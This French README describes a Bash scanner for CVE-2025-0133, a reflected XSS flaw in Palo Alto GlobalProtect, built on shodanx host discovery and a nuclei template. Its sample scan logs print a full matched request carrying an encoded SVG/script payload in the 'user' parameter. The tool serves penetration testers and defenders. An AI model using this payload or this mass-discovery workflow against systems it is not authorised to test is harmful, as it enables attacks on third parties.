
Vulnérabilité de type XSS réfléchi découverte dans Palo Alto GlobalProtect Gateway & Portal. Les attaquants peuvent injecter des scripts malveillants via des requêtes spécialement conçues.
Un outil de scan automatisé basé sur Bash pour détecter la vulnérabilité CVE-2025-0133 de type XSS réfléchi dans Palo Alto GlobalProtect Gateway & Portal à l'aide de nuclei et shodanx.
Auteur :
Date : 2025-06-23
Sévérité : Moyenne
Identifiant CVE : CVE-2025-0133
Type de vulnérabilité : Cross-Site Scripting réfléchi (XSS)
Testé contre : Palo Alto Networks GlobalProtect Portal (PAN-OS)
Cet outil aide les testeurs d'intrusion et les chercheurs en sécurité à identifier rapidement les domaines ou IP vulnérables liés au problème CVE-2025-0133.
Il exploite les templates nuclei et l'intégration des requêtes Shodan (shodanx) pour trouver et scanner efficacement les cibles.
shodanx sur les domaines uniques pour rassembler les hôtes associésnuclei avec un template CVE-2025-0133 personnalisé pour scanner les cibles.txt et .json$PATHCVE-2025-0133 situé à :/home/user/nuclei-templates/http/cves/2025/CVE-2025-0133.yaml (adaptez le chemin si nécessaire)pip install git+https://github.com/RevoltSecurities/ShodanX
Si l'erreur suivante s'affiche : "error: externally-managed-environment"
pip install git+https://github.com/RevoltSecurities/ShodanX --break-system-packages
⚠️ Remarque : L'option
--break-system-packagesest nécessaire sur certains systèmes (notamment Debian/Ubuntu) pour permettre à pip d'installer des paquets en dehors d'un environnement virtuel sans erreurs de permission.
👉 Assurez-vous que shodanx est disponible dans votre $PATH.
Vous pouvez le tester avec :
shodanx -h
go install -v github.com/projectdiscovery/nuclei/v3/cmd/nuclei@latest
Vérifiez s'il est installé :
nuclei -version
Mettez ensuite à jour les templates :
nuclei -update-templates
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh -h
Usage: ./cve20250133.sh <domain-or-file>
Scan CVE-2025-0133 vulnerabilities using nuclei and shodanx.
If input is a file, scan domains/IPs from the file.
If input is a domain, run shodanx to find related IPs/domains and scan them.
Options:
-h, --help, help Show this help message and exit.
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh domain.com
Scan Start Time: 2025-06-24 16:33:51
▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ █▌▟▖▄▌▄▌
-INTELEON404
[✔] Input is a single domain: domain.com — Running ShodanX first
_ _
| | | (_\ /
, | | __ __| __, _ _ \/
/ \_|/ \ / \_/ | / | / |/ | /\
\/ | |_/\__/ \_/|_/\_/|_/ | |_/ _/ \_/
- RevoltSecurities
[version]:shodanx current version v1.1.1 (latest)
[*] Scanning domain 123.45.67.890...
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 850.496188ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
┌──(user㉿administrator)-[~]
└─$ ./cve20250133.sh file.txt
Scan Start Time: 2025-06-24 16:36:37
▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▄▖▗ ▄▖▄▖
▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▛▌▜ ▄▌▄▌
▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ █▌▟▖▄▌▄▌
-INTELEON404
[✔] Input is a file: file.txt — Skipping ShodanX
[*] Scanning domain 123.45.67.890 ...
__ _
____ __ _______/ /__ (_)
/ __ \/ / / / ___/ / _ \/ /
/ / / / /_/ / /__/ / __/ /
/_/ /_/\__,_/\___/_/\___/_/ v3.4.5
projectdiscovery.io
[INF] Current nuclei version: v3.4.5 (latest)
[INF] Current nuclei-templates version: v10.2.3 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 105
[INF] Templates loaded for current scan: 1
[INF] Executing 1 signed templates from projectdiscovery/nuclei-templates
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] Scan completed in 28.825193ms. 1 matches found.
[CVE-2025-0133] [http] [medium] https://123.45.67.890/ssl-vpn/getconfig.esp?client-type=1&protocol-version=p1&app-version=3.0.1-10&clientos=Linux&os-version=linux-64&hmac-algo=sha1%2Cmd5&enc-algo=aes-128-cbc%2Caes-256-cbc&authcookie=12cea70227d3aafbf25082fac1b6f51d&portal=us-vpn-gw-N&user=%3Csvg%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%3Cscript%3Eprompt%28%22XSS%22%29%3C%2Fscript%3E%3C%2Fsvg%3E&domain=%28empty_domain%29&computer=computer
------------------------------------------------------
Vulnérabilité de type Cross-Site Scripting (XSS) réfléchi dans Palo Alto GlobalProtect Gateway & Portal permettant à des attaquants d'injecter des scripts malveillants via des requêtes spécialement conçues. Appliquez les correctifs en mettant à jour vos systèmes vers les dernières versions de Palo Alto Networks pour atténuer ce problème.
Ce projet est sous licence MIT — voir le fichier LICENSE pour plus de détails.